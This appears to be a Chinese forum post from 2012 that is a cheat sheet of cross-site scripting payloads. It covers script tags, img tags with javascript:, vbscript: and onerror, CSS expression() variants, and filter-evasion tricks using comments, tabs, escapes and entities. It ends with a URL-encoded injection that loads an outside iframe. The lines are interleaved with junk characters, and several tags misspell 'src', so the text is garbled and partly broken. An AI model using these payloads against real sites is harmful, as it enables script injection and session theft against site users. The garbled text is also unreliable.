<script>alert("跨站")</script> (最常用)
0 n3 a+ J6 ~$ w8 ?<img scr=javascript:alert("跨站")></img>
* s) l" D% }5 j6 ]* t<img scr="javascript: alert(/跨站/)></img>/ t( \- e' o: o/ m
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)0 G. f! s2 Q; x2 o" w8 d
<img scr="#" onerror=alert(/跨站/)></img>2 w r0 ~8 a a& b& Z( G
<img scr="#" style="xss:expression(alert(/xss/));"></img>3 \" z- i# @ o
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释) U$ E3 C. }9 J6 i
<img src=vbscript:msgbox ("xss")></img>+ `- r6 K9 o% ]6 j+ F" o3 E
<style> input {left:expression (alert('xss'))}</style>
# C+ l" L p0 h+ J! j<div style={left:expression (alert('xss'))}></div>
8 ~7 O+ ?7 ^# j T) P$ V% e<div style={left:exp/* */ression (alert('xss'))}></div>; G$ q' H7 ^, Z" a g
<div style={left:\0065\0078ression (alert('xss'))}></div> `5 o0 X% V5 }$ u' i
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>$ Z- N- C: J4 y( Y/ ]' _
unicode <div style="{left:expRessioN (alert('xss'))}">
$ |- k) H |& d/ y* e8 \+ r; I5 _( `# D& p; A: I
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
, ~& A- `+ K5 A/ s8 I, \- O# w |
发表于 2012-9-15 14:09:13
收藏
支持
反对